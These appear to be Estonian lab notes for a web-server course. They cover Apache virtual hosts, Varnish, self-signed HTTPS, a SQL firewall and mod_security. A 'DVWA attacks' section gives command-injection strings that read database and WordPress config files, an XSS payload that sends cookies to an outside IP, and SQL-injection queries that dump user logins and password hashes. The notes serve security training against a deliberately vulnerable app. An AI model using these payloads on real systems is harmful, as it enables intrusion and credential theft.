Virtualhost apache2 näitel
Apache seadistamine
/etc/hosts 192.168.56.101 www.planet.zz 192.168.56.101 sales.planet.zz
ping www.planet.zz
ping sales.planet.zz
apt-get update
apt-get dist-upgrade
apt-get install apache2
mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0
EOL
ifup eth1:0
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz
vim www.planet.zz
vim sales.planet.zz
a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload
WordPress tuning
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>
</VirtualHost>
Pange tähele muudetud Directory seadeid. <Directory /var/www/wordpress> AllowOverride All
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires
Selle rea võib lisada alglaadimisel käivitatavasse faili /etc/rc.local
Paigaldage oma valitud cace plugin wordpressile.
Varnish
Esmaselt tõstame apache2 porti 8080
/etc/apache2/ports.conf NameVirtualHost *:8080 Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
#testimiseks
grep ':80' *
service apache2 restart
#testimiseks
netstat -lntp
#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \ -T localhost:6082 \ -f /etc/varnish/default.vcl \ -S /etc/varnish/secret \ -s malloc,256m"
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
sub vcl_recv { # Add a unique header containing the client address remove req.http.X-Forwarded-For; set req.http.X-Forwarded-For = client.ip; # [...] }
service varnish restart
Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:
cd /etc/apache2/sites-available/
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.
nano wp
Sinna tuleb kirjutada CustomLog'i rea asemele
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta
cd /etc/apache2/conf.d/
Tee sinna uus fail nimega näiteks varnishlog.conf
nano varnishlog.conf
Kirjuta sinna see rida
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
Tee apache2 teenusele restart
service apache2 restart
DVWA ründed
HTTPS konfigureerimine
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /etc/ssl/private/www.planet.zz.key. Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub. The key fingerprint is: 76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server The key's randomart image is: +--[ RSA 2048]----+ | . | | + . | | o + | | * o | | S + O | | ..+ + + . | | ...o o = | | o+ o . | | .o. E | +-----------------+
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req
You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:EE State or Province Name (full name) [Some-State]:Harjumaa Locality Name (eg, city) []:Tallinn Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz Email Address []: Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []:
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
Signature ok subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz Getting Private key
cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl
Seal muuta sisu (sert, dokument root, keyfail)
Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile
ServerName www.planet.zz DocumentRoot /var/www/www.planet.zz SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
a2enmod ssl
a2ensite www.planet.zz-ssl
service apache2 restart
ID kaart
ID kaardiga autentimine Apache2 veebiserveriga
DVWA ründed
cmd exec
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
Loon faili kala /var/tmp kataloogi
8.8.8.8; touch /var/tmp/kala.txt
Ning kontrollin kas fail loodi
8.8.8.8; ls /var/tmp/
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
; grep session.cookie_httponly /etc/php5/apache2/php.ini
Väljund:
- kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:
session.cookie_httponly = 1
- kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))
session.cookie_httponly = 0
XSS
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
veel XSSi
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
SQLi
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --
2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --
3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
4' union select user_login,user_pass from wp.wp_users; #
3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
GreenSQL firewall
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb
dpkg -i greensql-fw_1.3.0_amd64.deb
apt-get install -f
#Modify existing virtualhost or create new virtualhost.
cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql
cd greensql
chmod 0777 templates_c
Kasutajanimi veebiliidesel on admin ja parool pwd.
Muutke DVWA config failis andmebaasi asukohta:
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
modsecurity
installeerimine
Juhend ubuntu 12.04 jaoks (paigaldab vana versiooni) - https://wiki.itcollege.ee/index.php/Mod_security
Vananenud juhend - https://wiki.itcollege.ee/index.php/Modsecurity
CRS
https://github.com/SpiderLabs/owasp-modsecurity-crs
Apache2 tweaks
ServerSignature Off
ServerTokens Prod
http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3